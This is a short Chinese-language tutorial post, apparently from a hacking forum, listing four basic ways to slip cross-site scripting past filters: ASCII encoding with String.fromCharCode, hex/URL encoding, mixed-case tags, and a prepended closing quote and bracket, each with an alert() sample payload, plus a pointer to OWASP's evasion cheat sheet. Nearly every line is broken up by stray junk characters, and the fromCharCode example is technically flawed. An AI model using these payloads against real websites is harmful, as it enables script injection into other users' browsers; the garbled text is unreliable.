四种超级基础的绕过方法。
" f k- g$ W2 {1.转换为ASCII码% X3 P N" L% B# b4 t
例子:原脚本为<script>alert(‘I love F4ck’)</script > D$ O% T0 h R+ `( s2 {" K6 o
通过转换,变成:
6 l+ q2 V9 }$ a5 f( a* n/ m6 |<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
7 O |4 v H' p% V2 w f4 w: B h
6 @1 F9 D) h w! g1 r5 | D: b' B2.转换为HEX(十六进制)
" a8 q/ Z* @6 W' ?% P Y. v, w- {例子:原脚本为<script>alert(‘I love F4ck’)</script>
o( H% T2 e7 x) M* V# o- w( Y$ h通过转换,变成:! r5 O; k+ D0 {
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
+ T1 A+ a7 P& H2 j" H+ ]9 s4 G# Y0 g4 d
0 d8 R( H( N4 O3.转换脚本的大小写
1 `) ^; A G M3 J例子:原脚本为<script>alert(‘I love F4ck’)</script>$ k6 H% `4 W/ U( y
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
( f8 ?4 B& i; y, A( ? ' \; M, B$ T7 i4 p# J
4.增加闭合标记”>
# G% h" _8 j* N& `/ i例子:原脚本为<script>alert(‘I love F4ck’)</script>; z6 @' x* v( P! d# y; P/ k
转换为:”><script>alert(‘I love F4ck’)</script>: T: _$ j8 Y9 R
更详细绕过技术请参考此网页2 A N. A; O0 ~5 [" i# K3 O7 H5 M
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
/ \( a8 p7 v3 }/ A+ l
, n. K. Y9 j( `0 u转换工具使用的是火狐的 hackbar mozilla addon. |